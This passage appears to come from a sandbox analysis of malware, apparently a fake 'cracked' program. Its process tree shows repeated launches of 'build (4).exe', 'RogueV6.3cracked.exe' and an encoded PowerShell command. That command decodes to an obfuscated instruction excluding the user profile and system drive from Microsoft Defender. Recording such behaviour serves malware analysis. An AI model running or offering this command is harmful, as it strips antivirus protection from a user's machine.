        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        272⤵
        
        PID:9556
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        272⤵
        
        PID:9592
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        272⤵
        
        PID:9608
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        273⤵
        
        PID:9692
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        273⤵
        
        PID:9716
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        273⤵
        
        PID:9728
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        274⤵
        
        PID:9848
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        274⤵
        
        PID:9876
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        274⤵
        
        PID:9908
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        275⤵
        
        PID:10008
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        275⤵
        
        PID:10032
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        275⤵
        
        PID:10056
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        276⤵
        
        PID:10112
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        276⤵
        
        PID:10140
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        276⤵
        
        PID:10160
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        277⤵
        
        PID:8312
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        277⤵
        
        PID:9264
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        277⤵
        
        PID:9076
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        278⤵
        
        PID:9372
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        278⤵
        
        PID:8572
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        278⤵
        
        PID:9468
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        279⤵
        
        PID:9412
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        279⤵
        
        PID:9460
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        279⤵
        
        PID:9528
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        280⤵
        
        PID:9656
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        280⤵
        
        PID:9280
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        280⤵
        
        PID:8668
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        281⤵
        
        PID:9864
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        281⤵
        
        PID:9728
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        281⤵
        
        PID:9744
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        282⤵
        
        PID:9908
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        282⤵
        
        PID:10192
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        282⤵
        
        PID:10128
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        283⤵
        
        PID:10160
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        283⤵
        
        PID:10092
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        283⤵
        
        PID:9284
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        284⤵
        
        PID:9692
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        284⤵
        
        PID:10132
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        284⤵
        
        PID:2180
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        285⤵
        
        PID:2064
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        285⤵
        
        PID:8312
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        285⤵
        
        PID:9648
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        286⤵
        
        PID:9528
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        286⤵
        
        PID:9732
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        286⤵
        
        PID:9664
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        287⤵
        
        PID:9208
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        287⤵
        
        PID:9920
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        287⤵
        
        PID:10136
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        288⤵
        
        PID:9564
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        288⤵
        
        PID:10128
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        288⤵
        
        PID:10008
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        289⤵
        
        PID:9960
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        289⤵
        
        PID:9140
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        289⤵
        
        PID:9396
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        290⤵
        
        PID:9580
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        290⤵
        
        PID:9652
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        290⤵
        
        PID:9076
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        291⤵
        
        PID:9836
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        291⤵
        
        PID:8560
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        291⤵
        
        PID:9988
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        292⤵
        
        PID:10028
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        292⤵
        
        PID:9928
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        292⤵
        
        PID:9232
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        293⤵
        
        PID:9476
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        293⤵
        
        PID:9688
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        293⤵
        
        PID:9208
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        294⤵
        
        PID:9568
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        294⤵
        
        PID:9404
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        294⤵
        
        PID:9076
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        295⤵
        
        PID:9672
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        295⤵
        
        PID:9564
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        295⤵
        
        PID:9988
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        296⤵
        
        PID:9392
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        296⤵
        
        PID:10056
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        296⤵
        
        PID:9328
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        297⤵
        
        PID:9288
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        297⤵
        
        PID:608
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        297⤵
        
        PID:10196
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        298⤵
        
        PID:9656
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        298⤵
        
        PID:10220
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        298⤵
        
        PID:10168
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
